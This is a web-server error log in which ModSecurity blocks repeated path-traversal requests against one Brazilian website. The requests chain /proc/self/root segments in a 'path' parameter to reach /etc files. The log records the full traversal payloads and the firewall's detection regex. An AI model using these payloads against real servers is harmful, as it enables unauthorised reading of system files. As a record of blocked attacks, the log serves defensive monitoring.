[Wed Mar 18 11:08:15.977972 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:41666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqxz_u8EFLIOrSqIpsH_QAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:17.284753 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:41680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx0fu8EFLIOrSqIpsIAAAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:18.625548 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:41690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx0uyqAr6etmhZHNrFFAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:19.923943 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:39834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx00zinOy1jxa1j4cZpAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:21.285888 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:39840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx1eyqAr6etmhZHNrFGQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:22.658313 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:39854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx1tY0UrI5A3LftIyvxAAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:24.903521 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:39866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx2NY0UrI5A3LftIyvyQAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:26.221609 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:39876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx2tY0UrI5A3LftIyvzQAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:26.473895 2026] [mime_magic:error] [pid 17653:tid 140411582465792] (70014)End of file found: [client 57.141.18.103:48132] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:08:27.551437 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:39882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx29Y0UrI5A3LftIyv0gAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:28.862377 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:39896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx3Mdf6f5d65gmYZTZ2AAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:31.330872 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:40244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx39Y0UrI5A3LftIyv4AAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:33.791110 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:40248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx4dY0UrI5A3LftIyv5wAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:40.147287 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:40264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx6Mdf6f5d65gmYZTZ4wAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:41.501749 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:41680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx6UzinOy1jxa1j4cZsAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:42.798660 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:41690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx6tY0UrI5A3LftIyv_wAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:43.267340 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.228.61:34186] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqx69a6ubjKNq_cu4aexAAAA04"]
[Wed Mar 18 11:08:46.706981 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.244.43:43740] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqx7imAPhZkrhU8w4lxqgAAAI8"]
[Wed Mar 18 11:08:49.586603 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:41700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx8cdf6f5d65gmYZTZ7wAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:57.895385 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:37498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx-eyqAr6etmhZHNrFPAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:08:59.218666 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:37502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqx-9a6ubjKNq_cu4ae0AAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:09:35.710526 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:49988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyH_u8EFLIOrSqIpsIWAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:09:38.690853 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:33662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyIeyqAr6etmhZHNrFWwAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
